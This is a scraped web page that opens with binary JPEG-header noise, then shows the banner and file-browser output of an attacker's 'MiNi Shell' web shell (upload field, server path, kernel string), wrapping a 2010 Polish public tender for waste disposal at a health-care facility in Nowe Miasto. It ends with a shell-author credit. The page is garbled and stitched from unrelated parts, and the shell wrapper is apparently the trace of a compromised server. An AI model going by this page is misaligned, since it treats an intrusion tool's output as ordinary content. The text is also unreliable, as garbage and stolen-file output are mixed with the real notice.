JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20101126/385748-N-2010.html

<p class="kh_header"><b>Nowe Miasto: Świadczenie usług w zakresie transportu i  utylizacji odpadów - zadanie nr... .  Nr. sprawy ZP, PN( 22   )2010 Nie otwierać przed dniem  07.12. 2010 r godz. 10 00 .</b><br>
<b>Numer ogłoszenia: 385748 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Tomaszowska 43, 26-420 Nowe Miasto, woj. mazowieckie, tel. 048 6743842, faks 048 6740040.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-nowemiasto.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie transportu i  utylizacji odpadów - zadanie nr... .  Nr. sprawy ZP, PN( 22   )2010 Nie otwierać przed dniem  07.12. 2010 r godz. 10 00 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego postępowania jest kompleksowa usługa kategoria 16 
   polegająca na odbiorze i  utylizacji odpadów  komunalnych ,pochodzących z 
   żywienia oraz odbiorze i utylizacji nieczystości płynnych i chemicznych 
   powstających na terenie terenie Samodzielnego Publicznego Zakładu Opieki
   Zdrowotnej w Nowym Mieście n. Pilicą , Przychodni Rejonowej w Drzewicy oraz z 
   Ośrodka Zdrowia w Żdżarach   wraz z udostępnieniem kontenerów  do 
   składowania odpadów  komunalnych i  pojemników na odpady  pochodzenia z 
   żywienia i chemiczne.
2.Przedmiot zamówienia podzielony został na 6 części. Każda ze wskazanych 
   części zamówienia określana będzie mianem (zadania).
 2.1.Zadanie nr 1 - Odpady komunalne (niesegregowane) z grupy 20 03 01  SP 
      ZOZ Nowe Miasto n. Pilicą w ilości wymienionej w załączniku nr 4 SIWZ ,
    1)W skład odpadów strony zaliczają w szczególności :
        - odpady powstające w obiektach użyteczności publicznej i obsługi ludności, 
           zbierane do typowych worków i pojemników ,
        - odpady pochodzące z zamiatania placów i ulic, a w szczególności 
           piasek ,pyłu ,odpady roślinne i inne nieużytkowe przedmioty ( w tym 
           opakowania tekturowe ),
        - odpady ,które nawet  po rozdrobnieniu  nie mogą  być umieszczane w 
           typowych pojemnikach ze  względu na swoja masę, np. stare meble, gruz z
           budowy itp. 
      2)Odbiór odpadów odbywać się będzie w kontenerach zamkniętych powyżej 
         1 m3 z częstotliwością podaną w załączniku nr 4 do SIWZ.
2.2.Zadanie nr 2 - Odpady komunalne (niesegregowane)  z grupy 20 03 01 z 
      Ośrodka Zdrowia w Żdżary w ilości wymienionej w załączniku nr 5 SIWZ ,
    1)W skład odpadów strony zaliczają w szczególności :
        - odpady powstające w obiektach użyteczności publicznej i obsługi ludności, 
          zbierane do typowych worków i pojemników ,
        - odpady pochodzące z zamiatania placów i ulic, a w szczególności 
           piasek ,pył ,odpady roślinne i inne nieużytkowe przedmioty ( w tym 
           opakowania tekturowe ),
        - odpady ,które nawet  po rozdrobnieniu  nie mogą  być umieszczane w 
           typowych pojemnikach ze względu na swoja masę, np. stare meble, gruz z 
           budowy itp. 
      2)Odbiór odpadów odbywać się będzie w kontenerach zamkniętych powyżej 
         1 m3 z częstotliwością podaną w załączniku nr 5 do SIWZ.
2.3.Zadanie nr 3 - Odpady komunalne (niesegregowane)  z grupy 20 03 01 z 
     Przychodni Rejonowej w Drzewicy  w ilości wymienionej w załączniku nr 6 
     SIWZ ,
     1)W skład odpadów strony zaliczają w szczególności :
        - odpady powstające w obiektach użyteczności publicznej i obsługi ludności, 
           zbierane do typowych worków i pojemników ,
        - odpady pochodzące z zamiatania placów i ulic, a w szczególności 
           piasek ,pył ,odpady roślinne i inne nieużytkowe przedmioty ( w tym 
           opakowania tekturowe ),
        - odpady ,które nawet  po rozdrobnieniu  nie mogą  być umieszczane w 
          typowych pojemnikach ze względu na swoja masę, np. stare meble, gruz z 
          budowy itp. 
      2)Odbiór odpadów odbywać się będzie w kontenerach zamkniętych powyżej 
         1 m3 z częstotliwością podaną w załączniku nr 6 do SIWZ.
 2.4.Zadanie nr 4 - Nieczystości płynne  z grupy 20 03 99 z Ośrodka Zdrowia w 
      Żdżarach w ilości wymienionej w załączniku nr 7 SIWZ ,
       1)W skład nieczystości  płynnych  strony zaliczają w szczególności :
        - ścieki powstające w obiektach użyteczności publicznej i obsługi ludności, 
          opadów deszczu  zbierane w zbiorniku (szambie) o pojemności 36.000,0 
          litrów.
      2)Odbiór nieczystości płynnych odbywać się będzie transportem kołowym 
         przystosowanym do ich odbioru z częstotliwością podaną w załączniku nr 7 .
2.5.Zadanie nr 5 - Odpady pochodzące z żywienia z grupy  20 02 01 w ilości 
      wymienionej w załączniku nr 8 do SIWZ,
    1)W skład odpadów strony zaliczają w szczególności :
      - odpady powstające z żywienia pacjentów w oddziałach szpitalnych i kuchni, 
        zbierane do typowych  pojemników.
    2)Wykonawca dostarczy nieodpłatnie pojemniki do gromadzenia odpadów w 
       odpowiedniej ilości .
   3)Odbiór odpadów odbywać się będzie  z częstotliwością podaną w załączniku 
      nr 8.
 2.6.Zadanie nr 6 - Odpady chemiczne SP ZOZ Nowe Miasto  n. Pilicą w ilości 
      wymienionej w  załączniku nr 9 SIWZ,
    1)W związku z magazynowaniem odpadów chemicznych pochodzących z 
       pracowni RTG  na terenie szpitala , wykonawca ,z którym zostanie podpisana  
       umowa na świadczenie usług będących przedmiotem zamówienia , 
       zobowiązany będzie do dostarczenia nieodpłatnie w wyznaczone miejsce 2
       pojemników o  pojemności około 100 litrów do gromadzenia odpadów 
       chemicznych  oraz innych opakowań wymienionych w załączniku nr  9 do 
       SIWZ. 
     2)Wykonawca zobowiązany będzie do odbioru i unieszkodliwiania odpadów 
       chemicznych powstałych z diagnozowania,  leczenia i profilaktyki medycznej 
       należących do następujących grup i rodzajów odpadów (kwalifikacja  zgodnie 
       z Rozporządzeniem Ministra Środowiska z dnia 27.09.2001 r w sprawie
       katalogów odpadów  Dz. U. Nr 112.poz. 1206) jeden raz  w kwartale w 
       ustalonym przez zamawiającego telefonicznie dniu z wykonawcą jednak nie 
       później niż 3 dni po zgłoszeniu : 
      a)09 01 07 Błony i papier fotograficzny  zawierające srebro lub związki  
         srebra  (Klisze rtg),
      b)09 01 01 Wodne roztwory wywoływaczy i aktywatorów (wywoływacze rtg),
      c)09 01 04 Roztwory utrwalaczy (utrwalacze rtg).
      d)15 01 02 Odpady z tworzyw sztucznych po odczynnikach chemicznych.
3.Zamawiający zachowuje prawo do określenia innej częstotliwości odbioru 
   odpadów wymienionej w  formularzach (asortymentowo-cenowych )zgodnie z 
   jego potrzebami i bez ponoszenia dodatkowych  kosztów oraz w przypadku 
   zmiany przepisów prawa w tym  zakresie.
4.Odbiór i wywóz wszystkich odpadów oraz nieczystości płynnych wymienionych w
   poszczególnych   zadaniach odbywać się będzie w dni robocze w godz. od 7 00 
   do 1500 w obecności upoważnionego  przedstawiciela zamawiającego  oraz 
   zostanie potwierdzony  na  drukach zgodnych z Rozporządzeniem  Ministra 
   Środowiska z dnia 14 lutego 2006 r.( Dz. U. z 2006 Nr 30  poz.213 .).
5.Opis  przedmiotu zamówienia wymienionego w poz. 2  i jego minimalna- 
   gwarantowana ilość została  określona w formularzach (asortymentowo-
    cenowych).
  a)Przewidywane ilość przedmiotu zamówienia oszacowano na podstawie danych 
     zużycia z lat  ubiegłych ( zawartych umów) oraz najlepszej wiedzy 
     zamawiającego co do potrzeb w okresie realizacji zamówienia.
6.Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia w trakcie 
   realizacji umowy zakresu  opisanego przedmiotu zamówienia  wyszczególnionego 
   w poszczególnych zadaniach w granicach  podanych w poszczególnych 
   zadaniach (załącznikach).  
  a)W przypadku zmniejszenia  ilości przedmiotu zamówienia  wykonawcy będzie
     przysługiwać  wynagrodzenie wynikające ze zrealizowanych usług.
  b)W przypadku zwiększenia ilości przedmiotu zamówienia wykonawcy 
     przysługiwać będzie zwiększone  wynagrodzenie przedmiotu zamówienia 
     obliczone po cenach wymienionych w formularzach  (asortymentowo-
     cenowych) oferty.
 7.Zamawiający dopuszcza  składanie ofert częściowych na poszczególne zadania. 
   Jednocześnie zastrzega , że jeden wykonawca może złożyć tylko jedną ofertę 
   częściową obejmującą dowolną liczbę zadań. 
 8.W ramach pojedynczego zadania przedmiot zamówienia jest niepodzielny .
 9.Zamawiający nie przewiduje zamówień uzupełniających ,o których mowa w art
    67 ust 1 pkt 7 ustawy oraz  podpisania umowy ramowej. 
    Wielkość zamówienia poniżej 193 000.0 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.40.00.00-1, 90.50.00.00-2, 90.51.10.00-2, 90.48.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje składania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania ,iż wykonawca posiada uprawnienia do odbioru i utylizacji odpadów musi dostarczyć:   aktualne koncesje ,zezwolenia ,decyzje organów administracyjnych ,jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia ,decyzji na podjęcie działalności gospodarczej w zakresie objętym  przedmiotem  zamówienia tj. odbiór,transport i  unieszkodliwianie odpadów - dotyczy wszystkich zadań, (dotyczy to również podwykonawcy w przypadku powierzenia wykonania części zamówienia podwykonawcom)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga ,aby Wykonawca był ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimum  50.000,0 zł .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Pełnomocnictwo do reprezentowania ,o ile ofertę składa pełnomocnik.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w projekcie umowy zmiany umowy będą mogły nastąpić w następujących okolicznościach :                                                   a)W przypadku zmiany obowiązujących przepisów prawnych mających 
  zastosowanie przy udzielaniu  zamówień publicznych, treść umowy będzie 
  zmieniała się stosownie do wprowadzonych rozwiązań  prawnych.                     b)W przypadku zmian stawki podatku VAT cena netto nie ulegnie zmianie, nastąpi  
   jedynie zmiana ceny brutto co spowoduje zmianę wynagrodzenia wykonawcy 
   (ceny) o kwotę wynikająca ze zmienionych stawek tego podatku   
   obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania 
umowy.                                                                                                     c)W przypadku zmiany wskaźnika wzrostu cen  i usług konsumpcyjnych 
  ogłoszonego  przez Główny Urząd Statystyczny cena ulegnie zmianie o wielkość 
  tegoż wskaźnika.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz-nowemiasto.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej 26-420 Nowe Miasto n. Pilicą ul. Tomaszowska 43.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 09:30, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Nowym Mieście n. Pilicą ul. Tomaszowska 43 (budynek administracyjny - sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com